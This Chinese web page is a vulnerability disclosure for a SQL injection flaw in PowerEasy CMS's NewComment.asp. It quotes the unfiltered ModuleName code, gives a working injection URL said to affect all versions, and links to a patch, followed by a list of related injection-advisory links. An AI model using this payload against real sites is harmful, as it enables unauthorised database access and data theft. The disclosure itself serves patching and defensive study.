动易html在线编辑器 漏洞,动易NewComment.asp注入漏洞
在NewComment.asp文件中
ModuleName = Trim(request(\"ModuleName\"))
这个ModuleName变量没过滤好,从而导致,我们可以在下面的SQL语句中构造我们的
SQL语句
If ModuleName <> \"\" Then
If ChannelID <> 0 Then
If ClassID <> 0 Then
sqlComment = \"Select top \" & Num & \" C.* from PE_Comment C left join PE_\" & ModuleName & \" A on C.InfoID=A.\" & ModuleName & \"ID where A.ChannelID= \" & ChannelID & \" and A.ClassID= \" & ClassID & \" and C.Passed =\" & PE_True
sqlComment = \"Select top \" & Num & \" C.* from PE_Comment C left join PE_\" & Article+A+on+C.InfoID=A.ArticleID+where+A.ChannelID=1+and+1=1
在A.ChannelID=1后就可以构造我们的SQL语句。(其中空格用+来代替。)
NewComment.asp?num=1&ChannelID=1&ClassID=1&ModuleName=Article+A+on+C.InfoID=A.ArticleID+where+A.ChannelID=1%20and%20user>0--
所有版本(包括免费版、商业SQL版及Access版)
补丁下载:
http://bbs.powereasy.net/dispbbs.asp?boardID=67&ID=280136&page=1
动易html在线编辑器 漏洞,动易NewComment.asp注入漏洞相关推荐
- 动易html在线编辑器 漏洞,动易网站管理系统vote.asp页面存在SQL注入漏洞
动易网站管理系统vote.asp页面存在SQL注入漏洞 测试系统: 动易(PowerEasy CMS SP6 071030以下版本) 安全综述: 动易网站管理系统是一个采用 ASP 和 MSSQL 等 ...
- 动易html在线编辑器 漏洞,动易系统解决IE8网站后台编辑器无效问题
微软的IE8正式版已于2009年3月20日正式发布了,也有不少的动易用户升级了自己的浏览器,但在升级后都发现动易的后台编辑器无法使用了,症状就是点击任何功能图标都没有弹出设置窗口,经过搜索了一下,终于 ...
- SQL注入天书-ASP注入漏洞全接触
引 言 随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多.但是由于这个行业的入门门槛不高,程序员的水平及经验也参差不齐,相当大一部分程序 ...
- java 漏洞挖掘_Apache Tika命令注入漏洞挖掘
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担. 介绍 这篇文章将从一个Apache tika服务器的命令注入漏洞到完全利用的步骤. ...
- php模板注入漏洞,74CMS前台模板引擎注入漏洞漏洞复现
74CMS 曝高危漏洞,攻击者只需注册会员账号,上传一份包含恶意内容的简历,即可控制网站服务器,进行任意操作. 漏洞复现.jpg 74CMS 又称 "骑士 CMS ",是一项以 P ...
- ASP注入漏洞全接触[转自www.hacker.com.cn 黑客防线]
随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多.但是由于这个行业的入门门槛不高,程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进 ...
- php云人才系统漏洞,php云人才系统 注入漏洞
### 简要描述: php云人才系统 注入漏洞 ### 详细说明: php云人才系统 注入漏洞 tenpay的KEY没有初始化 导致的注入漏洞! ``` /api/tenpay/return_url. ...
- recommend.php sql注入漏洞,Espcms通杀SQL注入漏洞分析(附EXP)
漏洞:Espcms 通杀 SQL注入漏洞分析附EXP 漏洞作者:Seay博客:www.cnseay.com 官网介绍: 易思ESPCMS企业网站管理系统基于LAMP开发构建的企业网站管理系统,它具有操 ...
- Linux注入漏洞,phpBB多个SQL注入漏洞
发布日期:2012-07-28 更新日期:2012-08-01 受影响系统: phpBB Group phpBB 描述: --------------------------------------- ...
最新文章
- another app is currently holding the yum lock;waiting for it to exit解决
- 无法找到脚本文件adsutil.vbs的解决方法
- Pytorch学习 - Task5 PyTorch卷积层原理和使用
- 关闭浏览器后退出登录_chdbits打不开了,关闭了吗
- MySQL锁机制,行锁jingran加在索引上
- 小小知识点(九)——拉盖尔高斯波束自由空间傍轴近似条件下的复振幅
- 如何在 JavaScript 面试中过五关斩六将?
- 解决 Tomcat禁用OPTIONS协议(不安全的HTTP方法)
- idea生成class文件反编译后中文乱码
- c语言傅立叶变换,傅立叶变换与傅立叶反变换的C语言实现
- cad中拖动文字时卡顿_CAD复制卡顿问题解决办法
- 服装网站建设策划书-服装网站建设目的需求分析策划书
- 使用 Anaconda 安装 Pytorch
- 构造非支配解集(Python)
- 从生活角度学习c++
- 分享10个高质量的插画网站
- java核心之类和对象
- Qt编写安防视频监控系统52-颜色配置
- ubuntu系统:插入耳机,两只耳机有一只没有声音或者声音偏小的问题
- WPF优化DrawingContext.DrawLine